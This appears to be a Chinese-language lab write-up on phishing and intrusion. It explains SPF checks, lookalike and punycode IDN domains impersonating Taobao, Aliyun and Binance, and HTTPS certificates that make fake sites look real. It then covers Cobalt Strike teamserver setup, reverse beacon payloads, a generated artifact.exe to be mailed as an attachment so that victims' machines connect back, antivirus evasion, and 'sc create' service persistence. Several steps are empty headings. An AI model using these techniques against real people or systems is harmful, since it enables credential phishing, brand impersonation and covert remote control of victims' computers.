完成伪造邮件发送试验
要想查看一个域名是否配置了SPF,可以用nslookup或者dig查看:
nslookup
-type=txt ***.com.cn
dig -t txt 163.com
未配置的是这样:
配置了的是这样
SPF可以配置为ip,也可以配置为域名
2、完成钓鱼域名试验
有了文案,怎么能让邮件看起来真实性更高呢?最简单的就是用超链接,把元素内容改成想要仿冒的域名,在邮箱页面上,就会直接显示元素的内容,我们可以使用一些与目标相似的域名。比如用0代替o,用1代替l,用vv代替w等等,这就需要发挥你的想象来寻找相似的域名:
http://www.taoba0.com/
http://www.a1iyun.com
如果找不到这样形似的域名或者这种域名比较贵的情况下,可以尝试一些更骚的操作。。例如使用国际域名这样的域名是怎么注册的呢?在了解怎么注册一个这样的域名前,需要先了解什么是国际域名(Internationalized domain name, IDN)。
IDN:
是指在域名中包含至少一个特殊语言字母的域名,特殊语言包括中文、法文、拉丁文等。在DNS系统工作中,这种域名会被编码成ASCII字符串,并通过Punycode进行翻译。
Punycode是一个根据RFC 3492标准而制定的编码系统,主要用于把域名从地方语言所采用的Unicode编码转换成为可用於DNS系统的编码。
目前,因为操作系统的核心都是英文组成,DNS服务器的解析也是由英文代码交换,所以DNS服务器上并不支持直接的中文域名解析,所有中文域名的解析都需要转成punycode码,然后由DNS解析punycode码。其实目前所说的各种主流浏览器都完美支持IDN域名,浏览器里面会自动对IDN域名进行Punycode转码,而地址栏依旧显示的是原始输入的IDN域名。
所以,要想注册“币安”的这个域名:
www.biṇaṇce.com
其实只需要注册他经过punycode转码后的域名:
www.xn--biace-4l1bb.com
然后让目标访问www.biṇaṇce.com,在地址栏中就很难被发现。punycode在线转换工具:http://tools.jb51.net/punycode/index.php
UniCode编码表https://www.cnblogs.com/csguo/p/7401874.html
这样我们便可以伪造域名钓鱼
然后将IDN域名以超链接写入邮件
https证书
最后要说一点,就是https证书,前边仿冒的再像,但如果浏览器上直接出现了不安全警告或者红斜杠,也很容易引起目标的警惕。所以在条件允许的情况下,尽量做戏做全套,现在普通的https证书也是很便宜的。证书的具体申请使用就不在这细说了,百度一下,全都知道。
3、完成伪造扩展名试验
使用KilerRat工具:
我们也可以使用图标修改器改图标
4、完成文件困绑试验
5、完成综合apt攻击工具cs木马上线实验
Cobalt
Strike是一款美国Red
Team开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt
Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。
Cobalt
Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上。当然你知道利用这款工具主要用于内网渗透以及APT攻击。
项目官网:https://www.cobaltstrike.com
实验环境:
服务器端(Linux):192.168.0.109 靶机(windows):192.168.19.130
使用cobaltstrike 3.14
实验步骤
将工具上传到kali系统中运行时给777权限
root@kali:/mnt/cobaltstrike# chmod 777 /mnt/cobaltstrike/
一、启动,连接服务器
启动服务端:(test 为待会靶机连接服务器的密码)./teamserver 192.168.0.109 test
Test为密码hash密码要与客户端一样诺不一样则此软件存在后面
客户端连接服务器运行:cs.bat
如果客户端 是Linux操作系统则运行以下命令,启动客户端:java -Dfile.encoding=UTF-8
-javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap
-XX:+UseParallelGC -jar cobaltstrike.jar
创建监听器。
4.0一、创建监听器
1、点击 Cobalt Strike ->
Listeners->Add,其中内置了八个Payload,
wndows/beacon_dns/reverse_dns_txt
windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
windows/beacon_bind_pipe
windows/beacon_tcp
windows/beacon_extc2
windows/foreign/reverse_http
windows/foreign/reverse_https
生成木马创建payload 让主机上线
运行该exe主机成功上线:可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。
同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。不过现在的电脑都装了杀毒软件,所以payload需做免杀。这个后续在研发
HttpsPayload应用
优点:可能过行为查杀、另外administrator运行可直接提升为system权限
第一步
第二步:创建服务
Sc create test binpath= ”c:\test.exe”
start= auto displayname= ”test”
Sc start test
Sc delete test
Sc top test